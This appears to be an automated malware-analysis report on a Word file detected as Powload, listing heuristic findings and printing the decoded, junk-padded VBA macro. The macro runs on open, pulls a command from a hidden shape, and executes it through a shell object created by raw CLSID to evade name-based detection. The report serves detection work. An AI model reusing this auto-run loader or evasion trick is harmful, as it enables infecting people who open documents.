MALICIOUS
252
Risk Score
Heuristics 9
-
ClamAV: Doc.Malware.Powload-6813877-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Powload-6813877-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
End Select Set wcsKMPW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + oDCnE) On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set wcsKMPW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + oDCnE) On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6106 bytes |
SHA-256: 80088535d6e35e3a1f348a690e586e68d18fc8b706bed583dfe7937267cae9fe |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
106 of 165 identifiers look randomly generated (e.g. 'RmMwpSwzcc') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "hiNObQiWDYEE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case svJGmbYH
Case 158480105
TuBdzI = 100818150
hmjhSX = CLng(154629934)
Case 49973352
cjjUq = Oct(UdNHUR)
cVjnBSWqW = WmjUEKcm
Case 229420376
XwXpwdhh = CDate(mButq)
LBfWF = Int(245792762 * FvMiGs)
End Select
On Error Resume Next
Select Case VMEHSz
Case 34007429
GowvAmP = 98085453
kziGUN = CLng(193900659)
Case 272172727
dnCpq = Oct(zaHzjr)
lRNZj = nKKoiC
Case 326384366
YMAzbSR = CDate(RZQznva)
RfWcMRt = Int(308330359 * SBqSwXn)
End Select
Set lVlmTf = Shapes("MFuXFEawd")
On Error Resume Next
Select Case EAXowprIh
Case 175636958
wXJdjff = 128190369
MhtzIuLK = CLng(271785719)
Case 90164233
wobRmTdEc = Oct(ktNuIEf)
NAILIlWHZ = DdjTUjZ
Case 53542201
sqNBbrLbo = CDate(CApfScNm)
fquitwAw = Int(318113877 * ZhVzJn)
End Select
On Error Resume Next
Select Case JoUOcBwXI
Case 230861826
TlVhf = 332137049
SJzlW = CLng(130925528)
Case 294820247
IGuYNbA = Oct(NptwLw)
ZPlCQDs = rKimw
Case 307295000
RAVDtqc = CDate(ViTWHslC)
VlYVlRcVP = Int(35465044 * NioBU)
End Select
RmMwpSwzcc = "" + hUzJicWi + NrGumcEz + CbsOLP + lVlmTf.TextFrame.TextRange.Text + zGbiwSi + AjsRcOE + hMBWUlB + SniXEq + iFvOspT
On Error Resume Next
Select Case ESQbq
Case 186034980
nqnPqlwta = 157518840
kBuvzR = CLng(8524808)
Case 226275858
wXYDs = Oct(zrTuzHmjt)
qRZinI = zGFzLITz
Case 174598431
UzQSj = CDate(woEZjaF)
VAjIzbDTn = Int(250341407 * wntliAv)
End Select
On Error Resume Next
Select Case GpwYuQU
Case 341170000
ULWnN = 65174622
Tvcnot = CLng(59963420)
Case 304429923
qRIwnrDnb = Oct(joiLPU)
cjudZWu = jADdmM
Case 216384215
aEwMC = CDate(dHjMza)
pjMTRQc = Int(881678 * QuNjDq)
End Select
Set wcsKMPW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + oDCnE)
On Error Resume Next
Select Case IASHwlw
Case 133569956
JAwPfV = 275199839
vqKpvwY = CLng(272086867)
Case 201557375
jkhERFNw = Oct(FmaGlHi)
wKKhE = rwLwkN
Case 10287449
STwSkfFjq = CDate(hvkrV)
YhNzcfUG = Int(179567938 * qGFGdlX)
End Select
On Error Resume Next
Select Case rddhalTuh
Case 49742923
bKNzjk = 239731613
kDbOC = CLng(126704641)
Case 294347142
DBbniZTz = Oct(zCzKFiq)
FfAwD = bbDiqPOa
Case 92977947
wPsFUkCq = CDate(bjhmsf)
kHzosrA = Int(136626617 * Mfqdh)
End Select
Const msRtiiVkif = 0
On Error Resume Next
Select Case dkwwvlUF
Case 266552878
NwmpbsZW = 93054126
CGBAtNiO = CLng(184704370)
Case 27925700
quKBHFH = Oct(PTMXcYqt)
WLPRsu = XizEhGGd
Case 238627178
XBboT = CDate(RhzNpiZc)
USrQo = Int(86073492 * zaiZHDHIM)
End Select
On Error Resume Next
Select Case XHXVoLC
Case 337628381
OaIaOjfPR = 313448323
HnzRfNifn = CLng(6268906)
Case 98967505
tqAzk = Oct(XBhVOfwW)
YSpNtn = RjHGqa
Case 216535126
LuzUPjN = CDate(ufutPmZT)
IwGNwn = Int(144348258 * iZRpdt)
End Select
On Error Resume Next
Select Case XiuGAsL
Case 133431020
BwMDZWVOn = 195302397
zVuCEBtjJ = CLng(206016644)
Case 205874979
AFiGP = Oct(uYbidDfsj)
izjqaL = CjrBzwi
Case 72672446
VoMwuQ = CDate(ZtFTV)
rXLSaCLwo = Int(223441697 * hcWXnuaw)
End Select
On Error Resume Next
Select Case fSdCzOCUT
Case 330402462
lJUGT = 61122447
zqUwhjp = CLng(72977763)
Case 332239886
nfZotZk = Oct(QfnkcCjiI)
VNvUKUuVc = luNmQjho
Case 162631142
rjjHCd = CDate(NOSPCaup)
ZSUEtYwD = Int(92880479 * RBUvVuG)
End Select
wcsKMPW.Run! RmMwpSwzcc, msRtiiVkif
On Error Resume Next
Select Case mdYVJT
Case 148734925
aNlDjwL = 61180762
iTfvkw = CLng(312729280)
Case 276100280
mXDzI = Oct(JnaqS)
FcPdll = OVPpvG
Case 264584985
wVBjc = CDate(GhzWaEku)
XUrIYqPRw = Int(72256778 * bjXhItU)
End Select
On Error Resume Next
Select Case VuoojF
Case 73466885
jRVTUnw = 27064471
hJijM = CLng(84534177)
Case 168990742
pjFSkfP = Oct(BrGotFtBu)
aMRDHYPKU = zlJhOPrZ
Case 37865026
zlFcTv = CDate(PKcQhmMmN)
mYhDZ = Int(70199001 * sPiYZiNU)
End Select
On Error Resume Next
Select Case tUzUr
Case 143845965
mQNIskK = 20730742
mtCslLtb = CLng(143378345)
Case 36809092
WjUUis = Oct(fVCmDk)
dljfz = RAmuw
Case 88674424
QiaWzmBDC = CDate(sizYfhizq)
qIZMvW = Int(772506 * VzaYQ)
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.